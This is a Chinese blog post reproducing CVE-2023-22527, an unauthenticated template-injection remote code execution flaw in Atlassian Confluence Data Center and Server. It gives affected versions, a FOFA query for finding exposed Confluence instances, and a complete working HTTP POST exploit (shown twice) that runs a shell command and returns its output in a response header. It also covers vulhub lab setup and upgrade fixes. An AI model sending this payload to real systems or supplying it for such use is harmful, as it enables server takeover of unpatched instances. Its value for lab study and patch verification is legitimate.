Atlassian Confluence 模板注入代码执行漏洞

最新推荐文章于 2024-08-07 23:11:43 发布
最新推荐文章于 2024-08-07 23:11:43 发布
阅读量794 收藏 6
点赞数 24
分类专栏: 漏洞集合 文章标签: atlassian web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32947907/article/details/135764046
版权

漏洞简介

Confluence 是由Atlassian公司开发的企业协作和文档管理工具。

Atlassian Confluence Data Center/Server 受影响版本中由于velocity vm模版可未授权访问,其中/aui/text-inline.vm使用findValue解析OGNL表达式,表达式过滤不严,导致存在模版注入漏洞。

攻击者可通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞。

影响范围

confluence_data_center@[8.0.0, 8.5.4)

confluence_server@[8.0.0, 8.5.4)

网络空间测绘查询

fofa:

app="ATLASSIAN-Confluence"

POC

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

本次漏洞复现环境采用P神的vulhub靶场

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527

环境搭建

下载docker文件启动一个docker环境

docker compose up -d

环境启动后,访问http://your-ip:8090即可进入安装向导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书:

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。

如果提示填写cluster node,路径填写/home/confluence即可:

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为

db,账号密码均为postgres:

漏洞复现

利用时直接发送带有payload的请求即可执行任意命令,返回的结果在HTTP返回头中。

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

修复方式

将 confluence_data_center 升级至 8.5.4 及以上版本

将confluence_data_center升级至 8.6.0 及以上版本

将confluence_data_center升级至 8.7.1 及以上版本

将 confluence_server 升级至 8.5.4 及以上版本

  专注分享安全知识,大家可以关注一下我的微信公众号,谢谢大家!

不积跬步,无以至千里;不积小流,无以成江河。

Notadmin20
关注
专栏目录
Atlassian Confluence RCE漏洞复现(CVE-2023-22527)
0xSec
01-23 2120
Atlassian Confluence/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷
Atlassian Confluence 远程代码执行漏洞复现(CVE-2021-26084)
0xSec
01-17 1433
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
【严重】Atlassian Confluence 模板注入代码执行漏洞
murphysec的博客
01-17 536
Confluence 是由Atlassian公司开发的企业协作和文档管理工具。Atlassian Confluence Data Center/Server 受影响版本中存在模版注入漏洞,攻击者通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞漏洞已在8.5.4版本中修复,可能与velocity引擎中对snakeyaml、antlr等组件的支持有关。
漏洞复现】CVE-2024-21683:Confluence远程代码执行漏洞
网络安全从业者的学习笔记
07-18 736
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
confluence注入漏洞
zzf9347的博客
03-18 391
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
漏洞分析】Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
网络安全知识分享
03-21 1400
Confluence 的开发者 Atlassian 已公告此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
【CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7954
【CVE-2022-26134】Confluence OGNL RCE 漏洞
Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396
最新发布
山兔的博客
08-07 479
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果提示填写路径,路径填写。我这边建立失败了,就不复现了。
漏洞复现】Atlassian Confluence远程代码执行漏洞(CVE-2023-22527)
做自己喜欢的事,并将其发挥到极致!
01-24 1279
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行
Atlassian Confluence 远程代码执行漏洞复现(CVE-2023-22527)
m0_50797689的博客
01-23 461
Confluence Data Center 是一种自托管解决方案,可为组织提供各种配置选项来满足团队协作需求。Confluence Server 是一种适用于小型团队的自托管解决方案,提供了基本的协作和知识管理功能。
atlassian confluece 信息泄露漏洞
cnbird's blog
08-28 1719
#!/usr/bin/env python import httplib, json, sys, re if (re.search("^https://", sys.argv[1].lower()) == None): httpconnection = httplib.HTTPConnection(re.split("^http://",sys.argv[1].lower())[1])
CONFLUENCE 使用模板
03-15
CONFLUENCE 使用模板 - CWIKIOSSEZ
【成功复现】Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
wuli1024的博客
01-25 1260
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)安全风险通告
smellycat000的专栏
01-16 787
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Atlassian Confluence 远程代码执行漏洞漏洞编号QVD-2024-2746,CVE-2023-22527公开时间2024-01-16影响量级十万级奇安信评级高危CVSS 3.1分数10.0威胁类型代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身份验证的远程攻击者可以...
confluence模版注入漏洞_CVE-2023-22527
网络安全。
01-24 612
ConfluenceAtlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行
Confluence 未授权漏洞分析(CVE-2023-22515)
蚁景网安学院
11-22 528
Confluence 是由 Atlassian 开发的企业级协作软件。2023年10月,Atlassian 官方披露 CVE-2023-22515 Atlassian Confluence Data Center &Server 权限提升漏洞。攻击者可构造恶意请求创建管理员,从而登录系统,造成敏感信息泄漏等。
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3832
CVE-2021-26084 CVE-2022-26134 漏洞复现
Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现
m0_64366018的博客
01-16 607
Confluence Data Center上存在一个注入漏洞漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码
confluence统计_【漏洞预警】confluence远程代码执行漏洞(CVE-2019-3396)
weixin_30716611的博客
12-28 507
概述近日,白帽汇安全研究院监测到互联网上出现了Confluence远程代码执行漏洞Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。利用该漏洞可以读取服务器上任意文件,进而可以包含恶意文件来执行代码。可能造成敏感信息泄露,服务器被控制等严重后果。分布情况根据FOFA的数据统计,全球...
Atlassian Confluence mysql报错
05-25
能否提供更具体的错误信息,以便更好地解决问题?一般来说,Atlassian Confluence mysql报错可能有很多种原因,以下是一些常见的解决方法: 1. 检查数据库连接信息是否正确,并确认数据库是否正常运行。 2. 确认数据库版本与Confluence版本是否匹配。 3. 检查数据库是否有足够的空间和资源。 4. 尝试重启Confluence和数据库服务。 5. 检查Confluence日志文件以获取更多信息。 6. 尝试升级Confluence或数据库版本,以修复可能存在的漏洞或错误。 如果以上方法无法解决问题,请提供更多详细的错误信息,以便更好地诊断问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值